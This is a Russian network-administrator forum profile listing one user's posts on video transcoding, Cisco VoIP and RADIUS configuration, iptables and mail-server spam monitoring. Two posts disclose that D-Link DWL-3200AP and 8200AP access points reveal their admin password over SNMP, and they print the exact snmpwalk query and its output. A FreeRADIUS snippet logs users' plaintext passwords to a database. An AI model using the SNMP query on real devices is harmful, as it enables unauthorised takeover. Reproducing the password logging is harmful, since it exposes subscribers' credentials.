Macro
-
Публикации
149 -
Зарегистрирован
-
Посещение
Сообщения, опубликованные пользователем Macro
-
-
maxlapshin
vlc -vvv rtp://239.10.10.5:1234 --sout "#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:rtp{dst=239.10.10.7,port=1234,mux=ts,ttl=1}"
Поставил убунту, vlc 2.0.3 также на транскодирование 3-х каналов - 10GHz занимает.
-
libx264 выполняет кодирование полностью на CPU.
На проц нагрузка большая, чтобы перекодировать в h264 3 канала - отжирается проц на 10GHz
-
Ок, ошибся.
Значь VLC с GPU пошустрее будет транскодить в h264?
Из ОC - Линукс поставлю, как VLC под линем с GPU дружит?
-
Со спутника принимаю MPEG2, надо транскодировать в h264.
Временно на Винде VLC транскодит, проц отжирается неплохо.
3 канала транскодить - 10GHz занимает по процу.
Если использовать CUDA то полегче будет?
Какие еще варианты транскодирования в H264?
-
В руках появилась DWL 8200 AP. Решил также проверить получение пароля по СНМП. Прошивка последняя доступная на сайте.
[root@radius ~]# snmpwalk -v2c -c public 192.168.10.113 1.3.6.1.4.1.171.10.37.32.4.1.1.1.4.1
SNMPv2-SMI::enterprises.171.10.37.32.4.1.1.1.4.1 = STRING: "adminpass"
Больше похоже на саботаж разработчиков, а не на отдельный баг на отдельной железке.
-
Опубликовано · Изменено пользователем Macro · Жалоба на ответ
Constantin
Зря вы так.
http://ftp.dlink.ru/pub/Wireless/DWL-3200AP/Firmware/2.56/
Последняя прошивка в мае 2012 года. Железка у многих стоит, по крайней мере у нас для коммерческого доступа Wi-Fi.
А данный баг был найден случайно мной, вот и поделился им.
Да и не факт что другие точки этим не грешат, в наличии других нет, чтобы проверить.
Ivan_83
Модели?
-
Опубликовано · Изменено пользователем Macro · Жалоба на ответ
Баг товарищи.
Если на DWL 3200 AP включен SNMP, то получить админский пароль как нефиг делать.
[root@gateway ~]# snmpwalk -v2c -c public 10.22.0.3 1.3.6.1.4.1.171.10.37.20.4.1.1.1.4.1
SNMPv2-SMI::enterprises.171.10.37.20.4.1.1.1.4.1 = STRING: "adminpassword"
Это что ж за фигня то?
В конфиге значит пароль скрыт, а по снмп любой левый может получить пароль.
Хотя бы АСЛками можно было бы прикрыть СНМП, было бы хорошо.
P.S. В руках появилась DWL 8200 AP. Решил также проверить получение пароля по СНМП. Прошивка последняя доступная на сайте.
[root@radius ~]# snmpwalk -v2c -c public 192.168.10.113 1.3.6.1.4.1.171.10.37.32.4.1.1.1.4.1
SNMPv2-SMI::enterprises.171.10.37.32.4.1.1.1.4.1 = STRING: "adminpass"
Больше похоже на саботаж разработчиков, а не на отдельный баг на отдельной железке.
-
Есть в наличии у кого?
По ссылкам 404 ошибка.
-
ПОхоже проблема на ВиндоусХР :)
Вопрос снимается.
-
В наличии несколько десятков DWL 3200 AP. Задача организовать защищенную Wi-Fi сеть для мобильных клиентов по индивидуальному логину и паролю.
Обновил до 2.56 версии, включаю WPA2-Enterprise, прописал радиус сервер - при подключении к Wi-Fi сети у виндоус клиента выдается окно - что не может найти сертификат чтобы войти в беспроводную сеть.
Т.к. клиенты мобильные, то в корне неправильно распространять индивидуальные сертификаты. Как быть? Прочитал чтобы не использовать клиентский сертификат - то надо включить EAP-TTLS.
Как это сделать?
-
2 линукс сервера, запущен одинаковый сервис.
Находятся в одной ип сети (хх.хх.хх.11 и хх.хх.хх.12)
Нагрузку разделил между ними по ДНСу.
Теперь хочу привязать какую нибудь приблуду которая бы в случае потери связи с другим сервером, поднимала алиас с ип последнего.
Т.е. ip takeover.
Можно конечно какую нить пинговалку по крону и если молчит партнер то ifconfig eth0:1 xx.xx.xx.11 up
но это как то вычурно.
-
Как создать отчет? В темплейтах нет нужного функционала.
Софт 3.7.5.
-
BRAS - Cisco, в случае потери связи между клиентом и БРАСом, то сессия рвется на брасе автоматически.
В то же время, работает скрипт который забирает список активных сессий на брасе и сравнивает с радакктом в базе и списки уравниваются.
Не вижу смысла дропать сессию абонента каждые 24 часа, я б нафиг убежал с такого прова.
Переключение скорости на Cisco ISG происходит в онлайн режиме, сервисы деактивировались, сервисы активировались.
-
В наличии Wowza 2.2.4, камера axis m1114.
Вовза забирает поток с камеры и транслирует его клиентам через flowplayer. Это настроил по мануалам.
У флоуплеера есть куча плагинов в том числе bandwidth checker, bitrate selection и т.д.
Собственно вопрос в том, где должно происходит уменьшение/увеличение качества/битрейта видео потока? Предполагаю что в вовзе, а плагины плеера переключаются между потоками с различными битрейтами.
Ну и как бы это настроить? Как нарезать видео поток с камеры на несколько потоков с различным битрейтом и скормить их плееру?
Вовза как уже говорил 2.2.4, мануалы нашел только для 3.x.x.
-
Опубликовано · Изменено пользователем Macro · Жалоба на ответ
Пока прикрутил скрипт который считает кол-во сасл логины за заданный промежуток времени и отправляет на почту, пока не решил какой установить трешолд при которых бить тревогу.
#!/bin/sh MAILLOG=/var/log/maillog DAT1=/tmp/smtp_auth-offset.dat /usr/bin/logtail -f $MAILLOG -o $DAT1 | grep sasl_username | awk '{print $9}' | sort | uniq -c | sort -n -r | formail -c -I"Subject: SMTP Auth Statistics" -I"From: postmaster@domain.com" -I"To: admin@domain.com" -I"Received: from mail.domain.com ([xx.xx.xx.xx])" | sendmail admin@domain.com
скрипт в кронтаб, например раз в час.
-
SMTP авторизация включена, с мира подбирают пароли и отправляют с авторизацией.
Думаю какую бы мониторилку прикрутить для реалтайм мониторинга исходящей почты и смтп авторизации.
А также где находить свой сервер в блоклистах? Чтобы наиболее полный и популярный список, а не тот который никто не пользуется.
-
Опубликовано · Изменено пользователем Macro · Жалоба на ответ
postauth_query = "INSERT INTO ${postauth_table} \ (username, pass, reply, authdate,callingstationid,nasportid) \ VALUES ( \ '%{User-Name}', \ '%{%{User-Password}:-%{Chap-Password}}', \ '%{reply:Packet-Type}', TO_DATE('%S','yyyy-mm-dd hh24:mi:ss'),'%{Calling-Station-Id}','%{NAS-Port-Id}')"
Вот так складываем логи авторизаций абонентов в базу, как удачные так и не удачные.
Это в dialup.conf
Ну и включить в sites-enabled/default:
post-auth { sql exec Post-Auth-Type REJECT { attr_filter.access_reject sql } }
-
Как обнаруживать и предотвращать рассылку спама от абонентов?
SMTP - Postfix.
Принимаются предложения и комментарии. :)
Интересует работа на предупреждение, SMTP авторизацию включать не рекомендовать - в список mynetworks - внесена провайдерская подсетка, и клиенты должны отправлять письма безо всякой смтп авторизации.
Хотя есть пример, и с смтп авторизацией фримайл сервиса, пароли взламываются или регятся заново и рассылают спам, 24 часа сидеть на логами - и как в матрице различать спамеров - неблагодарное дело.
Посоветуйте какой нибудь свистелку которая бы предупреждала об аномальной активности клиента.
-
Вообщем отказался от vrf'a, прописал статик роуты на серые подсетки.
теперь все ок.
-
В конфиге меняю
voice service voip sip bind control source-interface GigabitEthernet0/1 bind media source-interface GigabitEthernet0/1 dial-peer voice 100 voip session target ipv4:xx.xx.xx.242
Звонок не идет на внешний астериск.
-
Опубликовано · Изменено пользователем Macro · Жалоба на ответ
Вообщем, задача такая, сделать SIP trunk через Интернет.
В наличии Cisco AS5400XM.
На as5400xm настроен h323 транк с софтсвичом (Huawei SoftX) по VRF'у.
Конфиг:
voice vrf NGN voice service voip allow-connections h323 to h323 allow-connections h323 to sip allow-connections sip to h323 allow-connections sip to sip sip bind control source-interface GigabitEthernet0/0 bind media source-interface GigabitEthernet0/0 interface GigabitEthernet0/0 ip vrf forwarding NGN ip address 1.1.1.1 255.255.255.240 ip access-group VOIP in duplex auto speed auto negotiation auto h323-gateway voip interface interface GigabitEthernet0/1 ip address xx.xx.xx.241 255.255.255.240 duplex auto speed auto negotiation auto dial-peer voice 100 voip destination-pattern 112 rtp payload-type cisco-codec-fax-ack 124 rtp payload-type nte 97 voice-class media 199 session protocol sipv2 session target ipv4:1.1.1.2 dtmf-relay rtp-nte codec g711ulaw
Сейчас настроен SIP транк внутри того же VRF'a до астериска, голос ходит, конвертация SIP->h323 - проходит, т.е. с софтсвича по h323 звонок уходит на астериск по сипу и обратно.
Теперь надо сделать тоже самое только для внешнего астериска, внешний интерфейс - GigabitEthernet0/1, с внешним ип адресом.
Немного сумбурно описал, так что сорри.
-
Линь обычный, iptables.
2 сетевые (eth0, eth1), 2 ип (х.х.х.х, у.у.у.у).
Есть апач который слушает 80 порт на eth1.
Надо, сделать локальный редирект между двумя сетевыми.
Т.е. трафик приходящий на eth0 на 80 порт, отправлять на eth1 и обратно.
iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 80-j DNAT --to у.у.у.у:80
- не работает.
Запрещающих правил нет, иптаблс пуст.
форвард включен:
net.ipv4.ip_forward = 1
тспдамп молчит:
tcpdump -i eth1 port 80
Если в правиле назначить ип не принадлежащий серверу, я.я.я.я - то по тспдампу видно что пакеты редиректятся.
А вот локальный редирект не срабатывает.
Апач на eth0 повесить тоже - не предлагать в силу определенных причин.
-
Как мигрировать почтовые ящики из линукс (постфикс, курьер) в Exchange 2010.
А также из TheBat! в MS Outlook, а то частью юзеров почту не хранит на сервере.
-
Дятел
Да, большая часть торрент трафика зашейпилась.
Определяет процентов на 70%.
Из шейпа на 10 мбит, пролезает на 14 мбит. А до этого вся сотня пролезала.
Транскодинг VLC + CUDA
в Телевидение: кабельное (КТВ) эфирное, цифровое (DVB), IPTV и OTT
Опубликовано · Жалоба на ответ
maxlapshin
Спасибо! :)